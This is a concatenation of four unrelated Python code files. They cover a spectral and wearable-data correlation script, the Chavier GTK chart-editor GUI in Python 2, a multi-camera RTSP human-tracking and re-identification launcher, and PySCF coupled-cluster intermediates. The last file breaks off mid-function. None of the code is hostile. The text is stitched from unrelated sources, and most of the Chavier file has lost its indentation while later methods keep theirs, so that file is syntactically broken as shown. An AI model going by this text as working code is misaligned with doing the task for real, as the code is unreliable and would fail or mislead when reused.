    df_times = sync.get_meta_data(data_dir, feature_key)  # TODO: also compute 2-min scores
    targets = sync.get_psd_overlaps(df_times, target_list)
    df = sync.merge_dfs(data_dir, feature_key, targets)
    da = sync.reshape_data(df, feature_key, targets)

    # Plot spectral data.
    da_psd = sync.reshape_data(df, feature_key, targets, psd_only=True)
    sync.plot_spectra(da_psd, 'psd', 'overlaid', data_dir, feature_key)

    # Plot spectral summary statistics.
    da_psd_stats = sync.compute_spectra_stats(df, feature_key)
    sync.plot_spectra(da_psd_stats, 'psd', 'ci', data_dir, feature_key)

    # Normalize all data.
    df_norm = sync.scale_data(df, 'minmax')
    da_norm = sync.reshape_data(df_norm, feature_key, targets)

    # Plot top PCs for each frequency.
    da_psd_norm = sync.reshape_data(df_norm, feature_key, targets, psd_only=True)
    [da_pcaf, df_pcaf_ratios] = sync.compute_pca(da_psd_norm, 5, 'frequency')
    # BUG FIX: previously passed the literal string 'feature_key' here
    # instead of the variable, unlike every other plot_spectra call.
    sync.plot_spectra(da_pcaf, 'pca', 'frequency', data_dir, feature_key)

    # Top PCs for each timestamp.
    df_norm_psd = sync.get_psd(df_norm, 'min1_spectra')[0]
    [da_pcaf_t, df_pcaf_ratios_t] = sync.compute_pca(df_norm_psd, 20, 'time')

    # Pearson's r of spectral features with wearable targets.
    # TODO: create a heatmap output for each correlation plot.
    # TODO: also run the correlation with coherence, not just power scores.
    da_pearsonr = sync.compute_correlations(df_norm, feature_key, target_list)
    sync.plot_spectra(da_pearsonr, 'corr', 'r_pval', data_dir, feature_key)
    sync.plot_spectra(da_pearsonr, 'corr', 'r', data_dir, feature_key)

    # Highest |r| with a significant p-value for sub-cortical & cortical channels.
    # TODO: save out these tables.
    da_top_sigcorrs = sync.get_top_sigcorrs(da_pearsonr, abs_val=True)
    df_top_ch = sync.get_top_channels(da_top_sigcorrs)
    dfl_top_ts = sync.get_top_timeseries(da_norm, da_top_sigcorrs, df_top_ch)
    sync.plot_timeseries(dfl_top_ts, data_dir, feature_key, 'datetime')
    sync.plot_timeseries(dfl_top_ts, data_dir, feature_key, 'samples')

    # Cross-correlation of the top time series.
    dfl_top_cc = sync.compute_top_ccfs(dfl_top_ts)
    sync.plot_crf(dfl_top_cc, feature_key, data_dir)

    # Time-domain PCs (min1 spectra columns only).
    [df_pcat, df_pcat_ratios] = sync.compute_pca(df_norm_psd.iloc[:, 0:252], 20, 'time')

    # Linear regressions against the wearable targets.
    [df_lr_preds, df_lr_metrics] = sync.run_lr_model(df_pcat.T, df_norm.loc[:, targets], 'top 20 PCs')
    [df_lr_preds2, df_lr_metrics2] = sync.run_lr_model(df_norm_psd.iloc[:, 0:252], df_norm.loc[:, targets], '504 freq features')
    # TODO: run the BLSTM, show its learning curve, and compare its
    # predictions with the linear-regression baselines.
|
# Copyright(c) 2007-2009 by <NAME> <<EMAIL>>
#
# This file is part of Chavier.
#
# Chavier is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Chavier is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Chavier. If not, see <http://www.gnu.org/licenses/>.
import pygtk
pygtk.require('2.0')
import gtk
from chavier.dialogs import (
TextInputDialog, PointDialog, OptionDialog, RandomGeneratorDialog,
AboutDialog, warning,
)
class GUI(object):
def __init__(self, app):
self.app = app
self.chart = None
self.surface = None
self.main_window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.main_window.connect('delete_event', self.delete_event)
self.main_window.connect('destroy', self.destroy)
self.main_window.set_default_size(640, 480)
self.main_window.set_title(u'Chavier')
vbox = gtk.VBox()
self.main_window.add(vbox)
vbox.show()
menubar, toolbar = self._create_ui_manager()
vbox.pack_start(menubar, False, False)
menubar.show()
vbox.pack_start(toolbar, False, False)
toolbar.show()
hpaned = gtk.HPaned()
vbox.pack_start(hpaned, True, True)
hpaned.show()
vpaned = gtk.VPaned()
hpaned.add1(vpaned)
vpaned.show()
block1 = self._create_sidebar_block(u'Data sets',
self._datasets_notebook_creator)
self._create_dataset("Dataset 1")
block1.set_size_request(-1, 200)
vpaned.add1(block1)
block1.show()
block2 = self._create_sidebar_block(u'Options',
self._options_treeview_creator)
vpaned.add2(block2)
block2.show()
self.drawing_area = gtk.DrawingArea()
self.drawing_area.connect('expose_event',
self.drawing_area_expose_event)
self.drawing_area.connect('size_allocate',
self.drawing_area_size_allocate_event)
hpaned.add2(self.drawing_area)
self.drawing_area.show()
self.main_window.show()
def _create_ui_manager(self):
self.uimanager = gtk.UIManager()
accel_group = self.uimanager.get_accel_group()
self.main_window.add_accel_group(accel_group)
action_group = gtk.ActionGroup('default')
action_group.add_actions([
('file', None, '_File', None, 'File', None),
('quit', gtk.STOCK_QUIT, None, None, 'Quit the program',
self.quit),
('edit', None, '_Edit', None, 'Edit', None),
('add_dataset', gtk.STOCK_ADD, '_Add dataset',
'<ctrl><alt>plus', 'Add another dataset', self.add_dataset),
('remove_dataset', gtk.STOCK_REMOVE, '_Remove dataset',
'<ctrl><alt>minus', 'Remove the current dataset',
self.remove_dataset),
('edit_dataset', gtk.STOCK_EDIT, '_Edit dataset name',
'<ctrl><alt>e', 'Edit the name of the current dataset',
self.edit_dataset),
('add_point', gtk.STOCK_ADD, 'Add _point', '<ctrl>plus',
'Add another point to the current dataset', self.add_point),
('remove_point', gtk.STOCK_REMOVE, 'Remove p_oint',
'<ctrl>minus',
'Remove the current point of the current dataset',
self.remove_point),
('edit_point', gtk.STOCK_EDIT, 'Edit po_int', '<ctrl>e',
'Edit the current point of the current dataset',
self.edit_point),
('edit_option', gtk.STOCK_EDIT, 'Edit op_tion', None,
'Edit the current option',
self.edit_option),
('view', None, '_View', None, 'View', None),
('refresh', gtk.STOCK_REFRESH, None, '<ctrl>r',
'Update the chart', self.refresh),
('tools', None, '_Tools', None, 'Tools', None),
('random-points', gtk.STOCK_EXECUTE, '_Generate random points',
'<ctrl>g', 'Generate random points',
self.generate_random_points),
('dump-chart-state', gtk.STOCK_CONVERT, '_Dump chart state',
'<ctrl>d', 'Dump internal chart variables',
self.dump_chart_state),
('help', None, '_Help', None, 'Help', None),
('about', gtk.STOCK_ABOUT, None, None, 'About this program',
self.about),
])
action_group.add_radio_actions([
('verticalbar', None, '_Vertical bars', None,
'Use vertical bars chart', self.app.VERTICAL_BAR_TYPE),
('horizontalbar', None, '_Horizontal bars', None,
'Use horizontal bars chart', self.app.HORIZONTAL_BAR_TYPE),
('line', None, '_Line', None,
'Use lines chart', self.app.LINE_TYPE),
('pie', None, '_Pie', None,
'Use pie chart', self.app.PIE_TYPE),
('scatter', None, '_Scatter', None,
'Use scatter chart', self.app.SCATTER_TYPE),
('stackedverticalbar', None, '_Stacked Vertical bars', None,
'Use stacked vertical bars chart',
self.app.STACKED_VERTICAL_BAR_TYPE),
('stackedhorizontalbar', None, '_Stacked Horizontal bars', None,
'Use stacked horizontal bars chart',
self.app.STACKED_HORIZONTAL_BAR_TYPE),
], self.app.VERTICAL_BAR_TYPE, self.on_chart_type_change)
self.uimanager.insert_action_group(action_group, -1)
ui = """<ui>
<menubar name="MenuBar">
<menu action="file">
<menuitem action="quit"/>
</menu>
<menu action="edit">
<menuitem action="add_dataset"/>
<menuitem action="remove_dataset"/>
<menuitem action="edit_dataset"/>
<separator />
<menuitem action="add_point"/>
<menuitem action="remove_point"/>
<menuitem action="edit_point"/>
<separator />
<menuitem action="edit_option"/>
</menu>
<menu action="view">
<menuitem action="refresh"/>
<separator />
<menuitem action="verticalbar"/>
<menuitem action="horizontalbar"/>
<menuitem action="stackedverticalbar"/>
<menuitem action="stackedhorizontalbar"/>
<menuitem action="line"/>
<menuitem action="pie"/>
<menuitem action="scatter"/>
</menu>
<menu action="tools">
<menuitem action="random-points"/>
<menuitem action="dump-chart-state"/>
</menu>
<menu action="help">
<menuitem action="about"/>
</menu>
</menubar>
<toolbar name="ToolBar">
<toolitem action="quit"/>
<separator />
<toolitem action="add_dataset"/>
<toolitem action="remove_dataset"/>
<separator />
<toolitem action="add_point"/>
<toolitem action="remove_point"/>
<separator />
<toolitem action="refresh"/>
</toolbar>
</ui>
"""
self.uimanager.add_ui_from_string(ui)
self.uimanager.ensure_update()
menubar = self.uimanager.get_widget('/MenuBar')
toolbar = self.uimanager.get_widget('/ToolBar')
return menubar, toolbar
def _create_sidebar_block(self, title, child_widget_creator):
box = gtk.VBox(spacing=6)
box.set_border_width(6)
label = gtk.Label()
label.set_markup(u'<span size="large" weight="bold">%s</span>' % title)
label.set_alignment(0.0, 0.5)
box.pack_start(label, False, False)
label.show()
child_widget = child_widget_creator()
box.pack_start(child_widget, True, True)
child_widget.show()
return box
def _datasets_notebook_creator(self):
self.datasets_notebook = gtk.Notebook()
self.datasets_notebook.set_scrollable(True)
return self.datasets_notebook
def _dataset_treeview_creator(self):
store = gtk.ListStore(float, float)
treeview = gtk.TreeView(store)
column1 = gtk.TreeViewColumn('x', gtk.CellRendererText(), text=0)
treeview.append_column(column1)
column2 = gtk.TreeViewColumn('y', gtk.CellRendererText(), text=1)
treeview.append_column(column2)
treeview.connect('row-activated', self.dataset_treeview_row_activated)
scrolled_window = gtk.ScrolledWindow()
scrolled_window.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)
scrolled_window.add(treeview)
treeview.show()
return scrolled_window
def _options_treeview_creator(self):
self.options_store = gtk.TreeStore(str, str, object)
options = self.app.get_default_options()
self._fill_options_store(options, None, self.app.OPTIONS_TYPES)
self.options_treeview = gtk.TreeView(self.options_store)
column1 = gtk.TreeViewColumn('Name', gtk.CellRendererText(), text=0)
self.options_treeview.append_column(column1)
column2 = gtk.TreeViewColumn('Value', gtk.CellRendererText(), text=1)
self.options_treeview.append_column(column2)
self.options_treeview.expand_all()
self.options_treeview.connect('row-activated',
self.options_treeview_row_activated)
scrolled_window = gtk.ScrolledWindow()
scrolled_window.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC)
scrolled_window.add(self.options_treeview)
self.options_treeview.show()
return scrolled_window
def _fill_options_store(self, options, parent_node, types):
for name, value in options.items():
value_type = types[name]
if isinstance(value, dict):
current_parent = self.options_store.append(parent_node,
(name, None, None))
self._fill_options_store(value, current_parent, value_type)
else:
if value is not None:
value = str(value)
self.options_store.append(parent_node,
(name, value, value_type))
def _get_current_dataset_tab(self):
current_tab = self.datasets_notebook.get_current_page()
if current_tab != -1:
return self.datasets_notebook.get_nth_page(current_tab)
def _create_dataset(self, name):
scrolled_window = self._dataset_treeview_creator()
scrolled_window.show()
label = gtk.Label(name)
self.datasets_notebook.append_page(scrolled_window, label)
def _get_datasets(self):
datasets = []
n_pages = self.datasets_notebook.get_n_pages()
for i in range(n_pages):
tab = self.datasets_notebook.get_nth_page(i)
label = self.datasets_notebook.get_tab_label(tab)
name = label.get_label()
treeview = tab.get_children()[0]
model = treeview.get_model()
points = [(x, y) for x, y in model]
if len(points) > 0:
datasets.append((name, points))
return datasets
def _get_chart_type(self):
action_group = self.uimanager.get_action_groups()[0]
action = action_group.get_action('verticalbar')
return action.get_current_value()
def _get_options(self, iter):
options = {}
while iter is not None:
name, value, value_type = self.options_store.get(iter, 0, 1, 2)
if value_type is None:
child = self.options_store.iter_children(iter)
options[name] = self._get_options(child)
else:
if value is not None:
converter = str_converters[value_type]
value = converter(value)
options[name] = value
iter = self.options_store.iter_next(iter)
return options
def _edit_point_internal(self, model, iter):
x, y = model.get(iter, 0, 1)
dialog = PointDialog(self.main_window, x, y)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
x, y = dialog.get_point()
model.set(iter, 0, x, 1, y)
self.refresh()
dialog.destroy()
def _edit_option_internal(self, model, iter):
name, value, value_type = model.get(iter, 0, 1, 2)
parents = []
parent = model.iter_parent(iter)
while parent is not None:
parents.append(model.get_value(parent, 0))
parent = model.iter_parent(parent)
parents.reverse()
parents.append(name)
label = u'.'.join(parents)
dialog = OptionDialog(self.main_window, label, value, value_type)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
new_value = dialog.get_value()
if new_value == "":
new_value = None
model.set_value(iter, 1, new_value)
self.refresh()
dialog.destroy()
def delete_event(self, widget, event, data=None):
return False
def destroy(self, widget, data=None):
gtk.main_quit()
def drawing_area_expose_event(self, widget, event, data=None):
if self.chart is None:
return
cr = widget.window.cairo_create()
cr.rectangle(event.area.x, event.area.y,
event.area.width, event.area.height)
cr.clip()
cr.set_source_surface(self.chart.surface, 0, 0)
cr.paint()
def drawing_area_size_allocate_event(self, widget, event, data=None):
if self.chart is not None:
self.refresh()
def on_chart_type_change(self, action, current, data=None):
if self.chart is not None:
self.refresh()
def dataset_treeview_row_activated(self, treeview, path, view_column):
model = treeview.get_model()
iter = model.get_iter(path)
self._edit_point_internal(model, iter)
def options_treeview_row_activated(self, treeview, path, view_column):
model = treeview.get_model()
iter = model.get_iter(path)
self._edit_option_internal(model, iter)
def quit(self, action):
self.main_window.destroy()
def add_dataset(self, action):
n_pages = self.datasets_notebook.get_n_pages()
suggested_name = u'Dataset %d' % (n_pages + 1)
dialog = TextInputDialog(self.main_window, suggested_name)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
name = dialog.get_name()
self._create_dataset(name)
self.datasets_notebook.set_current_page(n_pages)
dialog.destroy()
def remove_dataset(self, action):
current_tab = self.datasets_notebook.get_current_page()
assert current_tab != -1
self.datasets_notebook.remove_page(current_tab)
def edit_dataset(self, action):
tab = self._get_current_dataset_tab()
assert tab is not None
label = self.datasets_notebook.get_tab_label(tab)
name = label.get_label()
dialog = TextInputDialog(self.main_window, name)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
name = dialog.get_name()
label.set_label(name)
dialog.destroy()
def add_point(self, action):
tab = self._get_current_dataset_tab()
assert tab is not None
treeview = tab.get_children()[0]
model = treeview.get_model()
dialog = PointDialog(self.main_window, len(model) * 1.0, 0.0)
response = dialog.run()
if response == gtk.RESPONSE_ACCEPT:
x, y = dialog.get_point()
model.append((x, y))
self.refresh()
dialog.destroy()
def remove_point(self, action):
tab = self._get_current_dataset_tab()
assert tab is not None
treeview = tab.get_children()[0]
selection = treeview.get_selection()
model, selected = selection.get_selected()
if selected is None:
warning(self.main_window, "You must select the point to remove")
return
model.remove(selected)
self.refresh()
def edit_point(self, action):
tab = self._get_current_dataset_tab()
assert tab is not None
treeview = tab.get_children()[0]
selection = treeview.get_selection()
model, selected = selection.get_selected()
if selected is None:
warning(self.main_window, "You must select the point to edit")
return
self._edit_point_internal(model, selected)
def edit_option(self, action):
selection = self.options_treeview.get_selection()
model, selected = selection.get_selected()
if selected is None:
warning(self.main_window, "You must select the option to edit")
return
self._edit_option_internal(model, selected)
def refresh(self, action=None):
    """Rebuild self.chart from the current datasets and options and queue
    a redraw; with no datasets the chart is simply cleared."""
    datasets = self._get_datasets()
    if not datasets:
        self.chart = None
        return
    root = self.options_store.get_iter_first()
    alloc = self.drawing_area.get_allocation()
    self.chart = self.app.get_chart(datasets,
                                    self._get_options(root),
                                    self._get_chart_type(),
                                    alloc.width, alloc.height)
    self.drawing_area.queue_draw()
def generate_random_points(self, action=None):
    """Fill the current dataset with points produced by the random
    generator dialog, then redraw."""
    tab = self._get_current_dataset_tab()
    assert tab is not None
    model = tab.get_children()[0].get_model()
    dialog = RandomGeneratorDialog(self.main_window)
    if dialog.run() == gtk.RESPONSE_ACCEPT:
        for point in dialog.generate_points():
            model.append(point)
        self.refresh()
    dialog.destroy()
def dump_chart_state(self, action=None):
    # Debug helper: print the chart's geometry and value ranges to stdout.
    # No-op when no chart has been built yet.
    # NOTE: Python 2 print statements — this file is Python 2 code.
    if self.chart is None:
        return
    alloc = self.drawing_area.get_allocation()
    print 'CHART STATE'
    print '-' * 70
    print 'surface: %d x %d' % (alloc.width, alloc.height)
    print 'area   :', self.chart.area
    print
    print 'minxval:', self.chart.minxval
    print 'maxxval:', self.chart.maxxval
    print 'xrange :', self.chart.xrange
    print
    print 'minyval:', self.chart.minyval
    print 'maxyval:', self.chart.maxyval
    print 'yrange :', self.chart.yrange
def about(self, action=None):
    """Show the modal About dialog and dispose of it afterwards."""
    about_dialog = AboutDialog(self.main_window)
    about_dialog.run()
    about_dialog.destroy()
def run(self):
    # Hand control to the GTK main loop; blocks until the app quits.
    gtk.main()
def str2bool(str):
    """Parse the text "true" (case-insensitive) as True; anything else,
    including "1" or "yes", is False."""
    return str.lower() == "true"
# Maps a Python type to the callable that converts a stored string back
# into a value of that type (bool needs str2bool; `unicode` is Python 2).
str_converters = {
    str: str,
    int: int,
    float: float,
    unicode: unicode,
    bool: str2bool,
}
|
import multiprocessing as mp
import os
from threading import Thread
from human_tracker import camera_capture
from database import ImageDB
from absl import app, flags, logging
from absl.flags import FLAGS
import numpy as np
import pandas as pd
import signal, sys
import datetime as dt
import shutil
import time
# --- detector / model configuration ---
flags.DEFINE_string('framework', 'tf', '(tf, tflite, trt)')
flags.DEFINE_string('weights', './checkpoints/yolov4-416',
                    'path to weights file')
flags.DEFINE_integer('size', 416, 'resize images to')
flags.DEFINE_boolean('tiny', False, 'yolo or yolo-tiny')
flags.DEFINE_string('model', 'yolov4', 'yolov3 or yolov4')
# --- input sources and databases ---
flags.DEFINE_string('video', './data/video/', 'path to input video or set to 0 for webcam')
flags.DEFINE_string('rtsp_path', 'data/rtsp/rtsp_cam.xlsx', 'default rtsp camera path')
flags.DEFINE_string('reid_db_path', "../reid/archive", 'default reid database path, where all of the samples from cam are saved into the db with timestamp')
#flags.DEFINE_string('cam_db_path', '../reid/database', 'default cam database path')
#flags.DEFINE_string('merge_db_path', "../reid/database/merge", 'default merged reid database path, where all of the samples from cam are saved into the db with timestamp')
#flags.DEFINE_string('output', './outputs/', 'path to output video')
# --- output / display options ---
flags.DEFINE_boolean('output', False, 'path to output video')
flags.DEFINE_string('output_format', 'MJPG', 'codec used in VideoWriter when saving video to file')
flags.DEFINE_float('iou', 0.45, 'iou threshold')
flags.DEFINE_float('score', 0.50, 'score threshold')
flags.DEFINE_boolean('dont_show', False, 'dont show video output')
flags.DEFINE_boolean('info', False, 'show detailed info of tracked objects')
# fixed typo in the help text: "trascked" -> "tracked"
flags.DEFINE_boolean('count', False, 'count objects being tracked on screen')
#flags.DEFINE_boolean('db', True, 'save information in database')
flags.DEFINE_boolean('trajectory', False, 'draw historical trajectories on every tracked human')
# --- sampling / parallelism tuning ---
flags.DEFINE_integer('input_skip_frame', 8, 'number of frame to be skipped')
flags.DEFINE_integer('db_skip_frame', 8, 'number of frame to be skipped')
flags.DEFINE_boolean('saliant_sampling', True, 'select and store unique frame only into database')
flags.DEFINE_boolean('plot_graph', False, 'plot graph for soft threshold')
flags.DEFINE_integer('parallel_ps', 8, 'number of human tracker process to run')
flags.DEFINE_boolean('online', True, 'run online image extraction using rtsp')
flags.DEFINE_boolean('reid', True, 'set to True to run with REID, set to False if new labelled data are needed to be recorded')
# def db_process(*args):
# def signal_handler(sig, frame):
# name = mp.current_process().name
# print(str(name) + ': You pressed Ctrl+C!')
# db_list = []
# # args[0] is the camera list
# # args[1] is the length of camera list
# # args[2] is the cam path
# # args[3] is the db merge path
# # args[4] is the shared queue recording the database paths
# for i in range(args[1]):
# if args[0]:
# db_list.append(args[2] + "/Cam_" + str(args[0][i]) + ".db")
# # finish gathering the db_paths, run merge.
# print('Saving merge database..')
# now = dt.datetime.now()
# db_name = now.strftime("Reid_Interrputed_%Y%m%d.db")
# db_filepath = os.path.join(args[3], db_name)
# reid_db = ImageDB(db_name=db_filepath)
# reid_db.delete_dbfile()
# reid_db.create_table()
# reid_db.merge_data(db_list)
# sys.exit(0)
# signal.signal(signal.SIGINT, signal_handler)
# while True:
# db_list = []
# # args[0] is the length of camera list
# # args[1] is the shared queue recording the database paths
# while len(db_list) < args[1]:
# print("db_path_process: ", args[4].get())
# db_list.append(args[4].get())
# #time.sleep(1)
# # finish gathering the db_paths, run merge.
# print('Saving merge database..')
# now = dt.datetime.now()
# db_name = now.strftime("Reid_%Y%m%d.db")
# db_filepath = os.path.join(args[3], db_name)
# reid_db = ImageDB(db_name=db_filepath)
# reid_db.delete_dbfile()
# reid_db.create_table()
# reid_db.merge_data(db_list)
class MultiPs():
    """Owns the camera-capture worker processes plus the manager-shared
    flags used to pause the trackers and to rotate the reid database."""
    def __init__(self):
        self.job = []     # registered mp.Process workers (not yet started)
        self.thread = []  # registered helper threads
        self.cam = []     # channel numbers served by the workers
        # shared resource
        #self.db_queue = mp.Queue()
        self.manager = mp.Manager()
        # workers poll this: 1 = pause tracking while the db is rotated
        self.stop_tracker = self.manager.Value('i',0)
        # main save_db() loop keeps running while this value is truthy
        self.stop_main_ps = self.manager.Value('i',1)
        self.db_path = None            # path of the currently active db
        self.unique_id = self.manager.list()
    def log_msg(self):
        # Route multiprocessing's own logging to stderr at DEBUG level.
        mp.log_to_stderr()
        logger = mp.get_logger()
        logger.setLevel(logging.DEBUG)
    def new_job(self, name, target, *args):
        # Register (do not start) a daemon process; the two shared stop
        # flags are appended to the caller-supplied args.
        print("args: ", args)
        args = (*args, self.stop_main_ps, self.stop_tracker)
        print("new args: ", args)
        j = mp.Process(name=name, target=target, args=args)
        j.daemon = True
        self.job.append(j)
    def new_thread(self, name, target, *args):
        # Register (do not start) a daemon thread.
        t = Thread(name=name, target=target, args=args)
        t.daemon = True
        self.thread.append(t)
    def create_new_db(self):
        # Create a fresh, empty reid database stamped with today's date
        # and remember its path in self.db_path.
        #global db_path
        #global reid
        now = dt.datetime.now()
        db_name = now.strftime("Reid_%Y%m%d.db")
        db_path = os.path.join(FLAGS.reid_db_path, db_name).replace("\\","/")
        reid_db = ImageDB(db_name=db_path)
        print("reid db_path: ", db_path)
        reid_db.delete_dbfile()
        reid_db.create_table()
        self.db_path = db_path
        #reid = Reid(db_path)
    # main process will run this database
    def save_db(self):
        # Main-process loop: on Wednesday/Saturday pause the trackers,
        # rotate in a new database (once per such day), then resume.
        # Ticks once per second until stop_main_ps is cleared.
        renew_db = True
        while self.stop_main_ps.value:
            now = dt.datetime.now()
            t = now.timetuple()
            # t[6] consists of day name information. 0 = Monday. 4 = Friday.
            #print("t[6]: ", t[6])
            if t[6] == 2 or t[6] == 5:
                if renew_db:
                    # stop human tracker processes
                    self.stop_tracker.value = 1
                    # create new database on Wednesday and Saturday, and only renew one time on each day.
                    self.create_new_db()
                    renew_db = False
                    print("New Database with timestamp [", now.strftime("%A, %d. %B %Y %I:%M%p"), ']')
                    # reset human tracker processes
                    self.stop_tracker.value = 0
                else:
                    time.sleep(1)
            else:
                renew_db = True
                #print("self.stop_tracker: ", self.stop_tracker.value)
            #print("main process ticks..")
            time.sleep(1)
        print("save_db loop is ended..")
    def signal_handler(self, sig, frame):
        # SIGINT handler: move the active db into the Interrupt/ folder
        # (renamed with a timestamp), wait for the workers, then exit.
        print('Main Program: You pressed Ctrl+C!')
        # when ctrl + c, rename the database as interrupted
        if os.path.isfile(self.db_path):
            now = dt.datetime.now()
            db_name = now.strftime("Reid_Interrupted_%Y%m%dT%H%M%S.db")
            interrupt_path = os.path.join(FLAGS.reid_db_path, "Interrupt", db_name).replace("\\","/")
            #os.rename(self.db_path, interrupt_path)
            shutil.move(self.db_path, interrupt_path)
        for j in self.job:
            j.join()
        sys.exit(0)
def cam_stream(mps):
    """Run a single camera-capture process for the webcam channel and
    block until it finishes."""
    mps.job.clear()
    mps.new_job('camera_ch' + FLAGS.video, camera_capture, int(FLAGS.video))
    for proc in mps.job:
        proc.start()
    for proc in mps.job:
        proc.join()
def sequential_run(batch, cam, db_path, mps):
    """Run one batch of offline camera-capture processes to completion,
    while the main process handles scheduled database rotation."""
    mps.job.clear()
    mps.cam = cam
    print("batch:", batch)
    gpu_num = 0
    for ch in batch:
        mps.new_job('camera_ch' + ch, camera_capture, FLAGS.online, int(ch),
                    gpu_num, db_path)
    for proc in mps.job:
        proc.start()
    # main process stays here, rotating the db on its schedule
    mps.save_db()
    for proc in mps.job:
        proc.join()
def online_run(rtsp, cam, gpu, loc, db_path, mps):
    """Spawn FLAGS.parallel_ps RTSP capture processes and block until
    they all finish, rotating the database from the main process."""
    mps.job.clear()
    mps.cam = cam
    for i in range(FLAGS.parallel_ps):
        # cam[i] is an int channel number; rtsp[i] is its stream URL
        mps.new_job('camera_ch' + str(cam[i]), camera_capture, FLAGS.online,
                    cam[i], rtsp[i], gpu[i], loc[i], db_path)
        print("New online process for cam " + str(cam[i]))
    for proc in mps.job:
        proc.start()
    # main process stays here, rotating the db on its schedule
    mps.save_db()
    for proc in mps.job:
        proc.join()
def get_rtsp(file):
    """Load the camera table (one row per camera: RTSP URL, channel, ...)
    from an Excel workbook; returns a pandas DataFrame.

    Uses the ``openpyxl`` engine, so .xlsx files are supported.
    """
    table = pd.read_excel(file, dtype={'Camera RTSP Stream': str, 'Channel': int}, engine='openpyxl')
    return table
def create_ps_list(vfile):
    """Group channel numbers parsed from video file names into batches.

    File names must have the form ``ch<digits>.<ext>``.  Returns a list
    of batches (lists of channel-number strings), each batch at most
    FLAGS.parallel_ps long, or -1 if no valid file name is found.
    """
    ch_list = []
    for f in vfile:
        stem = os.path.splitext(f)[0]
        parts = stem.split('ch')
        # idiom fix: drop the redundant `== True` comparison
        if parts[0] == '' and parts[-1].isdigit():
            print(parts[-1])
            ch_list.append(parts[-1])
    if not ch_list:
        print("No video file with 'ch' name. Please rename your input video with 'ch[channel number].mp4'.")
        return -1
    ch_list.sort(key=int)
    # split into full batches of parallel_ps channels, plus one shorter
    # trailing batch when the count is not a multiple of parallel_ps
    last_ps_num = len(ch_list) % FLAGS.parallel_ps
    if last_ps_num != 0:
        last_ps = ch_list[-last_ps_num:]
        print("last_ps:", last_ps)
        first_ps = ch_list[:-last_ps_num]
        print("first_ps:", first_ps)
        ps_list = np.asarray(first_ps).reshape(-1, FLAGS.parallel_ps).tolist()
        ps_list.append(last_ps)
        print(ps_list)
    else:
        ps_list = np.asarray(ch_list).reshape(-1, FLAGS.parallel_ps).tolist()
        print(ps_list)
    return ps_list
def main_single(_argv):
    """Single-process debug entry point: default db, one tracker on channel 2."""
    # initialize database
    img_db = ImageDB()
    img_db.create_table()
    camera_capture(2)
def main(_argv):
    """absl entry point: create the dated reid db, then dispatch to the
    online (RTSP) or offline (video-folder / webcam) pipeline."""
    mps = MultiPs()
    signal.signal(signal.SIGINT, mps.signal_handler)
    # mps.log_msg()
    print("Parent Process PID: " + str(os.getpid()))
    print("Initialize database..")
    # create new database with timestamp
    mps.create_new_db()
    # initialize backup database
    #db_path = None
    # if FLAGS.db:
    #     db_path = "./database/Image_" + str(dt.datetime.now().strftime("%Y%m%dT%H%M%S")) + ".db"
    #     print("db_path main: ", db_path)
    #     img_db = ImageDB(db_path)
    #img_db.delete_dbfile()
    #img_db.create_table()
    # online mode
    if FLAGS.online:
        table = get_rtsp(FLAGS.rtsp_path)
        online_run(table.to_dict('dict')['rtsp'], table.to_dict('dict')['cam'], table.to_dict('dict')['gpu'], table.to_dict('dict')['loc'], mps.db_path, mps)
    # offline mode
    else:
        if not FLAGS.video.isdigit():
            # get video file info from video folder
            vfile = os.listdir(FLAGS.video)
            if len(vfile) == 0:
                print("No files in the " + FLAGS.video)
                return -1
            ps_list = create_ps_list(vfile)
            print("Start Multiprocessing..")
            table = get_rtsp(FLAGS.rtsp_path)
            # run new camera process, one batch at a time
            for batch in ps_list:
                sequential_run(batch, table.to_dict('dict')['cam'], mps.db_path, mps)
        else:
            # FLAGS.video is a digit -> treat it as a webcam channel
            cam_stream(mps)
    # for j in mps.job:
    #     j.start()
    # for j in mps.job:
    #     j.join()
    print("End of program.")
if __name__ == '__main__':
    try:
        app.run(main)
    except SystemExit:
        # absl's app.run() terminates via SystemExit; swallow it so the
        # interpreter exits quietly.
        pass
|
import tempfile
import numpy as np
import h5py
from pyscf import lib
#einsum = np.einsum
einsum = lib.einsum
# This is restricted (R)CCSD
# Ref: Hirata et al., J. Chem. Phys. 120, 2581 (2004)
### Eqs. (37)-(39) "kappa"
def cc_Foo(t1,t2,eris):
    """Occupied-occupied kappa intermediate F_ki (Eq. 37, Hirata 2004)."""
    nocc = t1.shape[0]
    out = eris.fock[:nocc,:nocc].copy()
    out += 2*einsum('kcld,ilcd->ki',eris.ovov,t2)
    out -= einsum('kdlc,ilcd->ki',eris.ovov,t2)
    out += 2*einsum('kcld,ic,ld->ki',eris.ovov,t1,t1)
    out -= einsum('kdlc,ic,ld->ki',eris.ovov,t1,t1)
    return out
def cc_Fvv(t1,t2,eris):
    """Virtual-virtual kappa intermediate F_ac (Eq. 38, Hirata 2004)."""
    nocc = t1.shape[0]
    out = eris.fock[nocc:,nocc:].copy()
    out -= 2*einsum('kcld,klad->ac',eris.ovov,t2)
    out += einsum('kdlc,klad->ac',eris.ovov,t2)
    out -= 2*einsum('kcld,ka,ld->ac',eris.ovov,t1,t1)
    out += einsum('kdlc,ka,ld->ac',eris.ovov,t1,t1)
    return out
def cc_Fov(t1,t2,eris):
    """Occupied-virtual kappa intermediate F_kc (Eq. 39, Hirata 2004)."""
    nocc = t1.shape[0]
    out = eris.fock[:nocc,nocc:].copy()
    out += 2*einsum('kcld,ld->kc',eris.ovov,t1)
    out -= einsum('kdlc,ld->kc',eris.ovov,t1)
    return out
### Eqs. (40)-(41) "lambda"
def Loo(t1,t2,eris):
    """Occupied-occupied lambda intermediate L_ki (Eq. 40, Hirata 2004)."""
    nocc = t1.shape[0]
    fov = eris.fock[:nocc,nocc:]
